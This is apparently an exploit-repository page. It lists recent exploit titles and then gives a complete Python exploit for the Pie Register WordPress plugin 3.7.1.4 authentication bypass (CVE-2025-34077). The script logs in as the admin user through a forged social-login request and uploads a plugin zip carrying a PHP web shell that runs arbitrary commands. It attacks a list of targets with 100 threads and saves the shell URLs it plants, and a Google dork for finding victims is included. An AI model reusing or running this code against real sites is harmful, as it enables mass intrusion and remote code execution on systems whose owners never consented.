599853959f
13 changes to exploits/shellcodes/ghdb Tenda FH451 1.0.0.9 Router - Stack-based Buffer Overflow Discourse 3.1.1 - Unauthenticated Chat Message Access Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE Simple File List WordPress Plugin 4.2.2 - File Upload to RCE Joomla JS Jobs plugin 1.4.2 - SQL injection LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Department Assignment Alias Nick Field LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Facebook Integration Page Name Field LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Operator Surname LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Personal Canned Messages LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via Telegram Bot Username LiveHelperChat 4.61 - Stored Cross Site Scripting (XSS) via the Chat Transfer Function Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)
90 lines
No EOL
2.8 KiB
Python
Executable file
90 lines
No EOL
2.8 KiB
Python
Executable file
# Exploit Title: Pie Register WordPress Plugin 3.7.1.4 - Authentication Bypass to RCE
|
|
# Google Dork: inurl:/wp-content/plugins/pie-register/
|
|
# Date: 2025-07-09
|
|
# Exploit Author: Md Amanat Ullah (xSwads)
|
|
# Vendor Homepage: https://wordpress.org/plugins/pie-register/
|
|
# Software Link:
|
|
https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip
|
|
# Version: <= 3.7.1.4
|
|
# Tested on: Ubuntu 22.04
|
|
# CVE: CVE-2025-34077
|
|
|
|
#!/usr/bin/env python3
|
|
import requests
|
|
import zipfile
|
|
import io
|
|
import sys
|
|
from concurrent.futures import ThreadPoolExecutor, as_completed
|
|
from colorama import Fore, Style, init
|
|
from threading import Lock
|
|
init(autoreset=True)
|
|
|
|
SHELL_PHP = "<?php if(isset($_GET['cmd'])) echo shell_exec($_GET['cmd']); ?>"
|
|
PLUGIN_DIR = "evilplugin"
|
|
ZIP_NAME = "evilplugin.zip"
|
|
SHELL_FILE = "shell.php"
|
|
OUTPUT_FILE = "Shells.txt"
|
|
HEADERS = {'User-Agent': 'Mozilla/5.0'}
|
|
TIMEOUT = 10
|
|
lock = Lock()
|
|
|
|
def FilterURLS(site):
|
|
site = site.strip()
|
|
if not site.startswith(('http://', 'https://')):
|
|
site = 'http://' + site
|
|
if not site.endswith('/'):
|
|
site += '/'
|
|
return site
|
|
|
|
def make_shell_zip():
|
|
buf = io.BytesIO()
|
|
with zipfile.ZipFile(buf, 'w') as z:
|
|
z.writestr(f"{PLUGIN_DIR}/{PLUGIN_DIR}.php", "<?php /* Plugin */ ?>")
|
|
z.writestr(f"{PLUGIN_DIR}/{SHELL_FILE}", SHELL_PHP)
|
|
buf.seek(0)
|
|
return buf
|
|
|
|
def exploit(target):
|
|
target = FilterURLS(target)
|
|
session = requests.Session()
|
|
data = {"social_site": "true", "user_id_social_site": "1"}
|
|
try:
|
|
r = session.post(f"{target}?pr_social_login=1", data=data, headers=HEADERS, timeout=TIMEOUT)
|
|
except:
|
|
print(f"{Fore.RED}[Failed] - {target}")
|
|
return
|
|
|
|
if not session.cookies:
|
|
print(f"{Fore.RED}[Failed] - {target}")
|
|
return
|
|
files = {"pluginzip": (ZIP_NAME, make_shell_zip(), "application/zip")}
|
|
try:
|
|
upload = session.post(f"{target}wp-admin/plugin-install.php?upload", files=files, headers=HEADERS, timeout=TIMEOUT)
|
|
except:
|
|
print(f"{Fore.RED}[Failed] - {target}")
|
|
return
|
|
|
|
if "Plugin installed successfully" in upload.text:
|
|
shell_url = f"{target}wp-content/plugins/{PLUGIN_DIR}/{SHELL_FILE}"
|
|
print(f"{Fore.GREEN}[Exploited] - {shell_url}")
|
|
with lock:
|
|
with open(OUTPUT_FILE, "a") as f:
|
|
f.write(shell_url + "\n")
|
|
else:
|
|
print(f"{Fore.RED}[Failed] - {target}")
|
|
|
|
def main(targets_file):
|
|
with open(targets_file, "r") as f:
|
|
targets = [line.strip() for line in f if line.strip()]
|
|
|
|
with ThreadPoolExecutor(max_workers=100) as executor:
|
|
futures = [executor.submit(exploit, target) for target in targets]
|
|
for _ in as_completed(futures):
|
|
pass
|
|
|
|
if __name__ == "__main__":
|
|
if len(sys.argv) != 2:
|
|
print(f"Usage: {sys.argv[0]} list.txt")
|
|
sys.exit(1)
|
|
|
|
main(sys.argv[1]) |